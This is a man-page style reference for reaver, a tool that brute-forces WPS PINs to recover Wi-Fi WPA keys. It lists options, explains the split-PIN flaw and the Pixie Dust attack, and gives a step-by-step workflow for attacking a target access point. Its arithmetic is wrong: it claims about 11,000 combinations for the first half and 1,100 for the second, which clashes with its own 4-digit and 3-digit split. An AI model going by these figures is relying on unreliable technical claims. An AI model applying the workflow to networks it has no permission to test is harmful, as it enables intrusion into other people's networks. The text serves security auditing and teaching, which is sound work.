reaver
Brute-force WPS PIN to recover WPA key
SYNOPSIS
reaver -i <interface> -b <BSSID> [options]
PARAMETERS
-i, --interface <interface>
Specifies the wireless interface to use, which must be in monitor mode (e.g., wlan0mon).
-b, --bssid <BSSID>
The BSSID (MAC address) of the target Access Point (AP) with WPS enabled.
-c, --channel <channel>
Sets the channel of the target AP. If not specified, Reaver attempts to auto-detect.
-p, --pin <PIN>
Specifies a known WPS PIN to test. Useful for verifying suspected or default PINs.
-vv, --verbose
Increases verbosity, showing more detailed information about the attack progress.
-L, --lock-delay <seconds>
Time to wait after detecting an AP lockout or rate-limiting (default is 60 seconds).
-x, --fail-retry <number>
Number of failed attempts before Reaver waits for a 'lock-delay' period.
--no-nacks
Disables sending NACK (Negative Acknowledgement) messages. Can sometimes help with certain APs.
--win7
Imitates the behavior of a Windows 7 client during the WPS handshake, which might bypass some AP lockouts.
--pixie-dust
Performs the WPS Pixie Dust attack, attempting to recover the PIN offline from a single WPS exchange.
--start-at <pin>
Starts the brute-force attack from a specific WPS PIN.
--end-at <pin>
Ends the brute-force attack at a specific WPS PIN.
--output-file <file>
Writes the output of the attack to the specified file.
--session <file>
Loads and saves the session to a specified file, allowing the attack to be resumed later.
DESCRIPTION
The reaver command is an open-source tool designed to exploit a critical vulnerability in the Wi-Fi Protected Setup (WPS) protocol. Its primary function is to perform an online brute-force attack against the WPS PIN, which is an 8-digit numerical code used for easy device connectivity. Reaver leverages a design flaw where the WPS PIN is verified in two independent halves (the first 4 digits and the next 3, with the last digit being a checksum), effectively reducing the complexity of brute-forcing from billions of possibilities to a few thousand for each half.
While initially developed for brute-forcing, Reaver has evolved to incorporate other WPS attack methods, most notably the 'Pixie Dust' attack, which can sometimes recover the WPS PIN offline from a single WPS transaction, bypassing the need for extensive online brute-forcing. Reaver is widely used in network security auditing to test the robustness of WPS implementations and is a significant tool in penetration testing.
CAVEATS
Using reaver for unauthorized access to wireless networks is illegal and unethical. It can cause network instability, AP lockouts, and may alert network administrators. It requires a wireless adapter capable of monitor mode and packet injection. Success is not guaranteed, as many modern APs have implemented stronger countermeasures against WPS attacks (e.g., faster lockouts, disabling WPS). The Pixie Dust attack's success depends on the AP's vulnerable WPS implementation.
PREREQUISITES
A specialized wireless network adapter capable of both monitor mode and packet injection is essential for reaver to function. Tools from the aircrack-ng suite, such as airmon-ng, are often used to put the wireless interface into the required monitor mode before running reaver.
ATTACK PRINCIPLES
The classic reaver brute-force attack exploits the WPS PIN verification process. The 8-digit PIN is split, and the AP confirms the validity of the first four digits separately from the next three (the last digit is a checksum). This allows reaver to test approximately 11,000 combinations for the first half and 1,100 for the second, significantly reducing the overall brute-force time compared to a full 8-digit PIN. The Pixie Dust attack, on the other hand, targets weaknesses in the WPS 'E-S1' and 'E-S2' nonces, allowing for an offline calculation of the PIN in some cases.
TYPICAL WORKFLOW
A common workflow involves:
1. Putting the wireless adapter into monitor mode using airmon-ng.
2. Scanning for WPS-enabled Access Points using wash -i <interface>.
3. Launching reaver against a target AP identified by wash using its BSSID and channel.
HISTORY
Reaver emerged as a groundbreaking tool in 2011, quickly gaining notoriety for demonstrating a severe vulnerability in the Wi-Fi Protected Setup (WPS) protocol. Its release brought widespread attention to the fundamental design flaw that allowed the 8-digit WPS PIN to be brute-forced relatively quickly. This exposure prompted many manufacturers to issue firmware updates to mitigate the vulnerability, often by disabling WPS by default or implementing aggressive lockout mechanisms. However, many older or unpatched devices remain vulnerable. The tool's development continued, integrating new attack vectors like the 'Pixie Dust' attack, which offered an often faster, offline method to retrieve the WPS PIN, further highlighting the protocol's weaknesses.
SEE ALSO
wash(1), airmon-ng(8), aireplay-ng(8), aircrack-ng(1), pixiewps(1)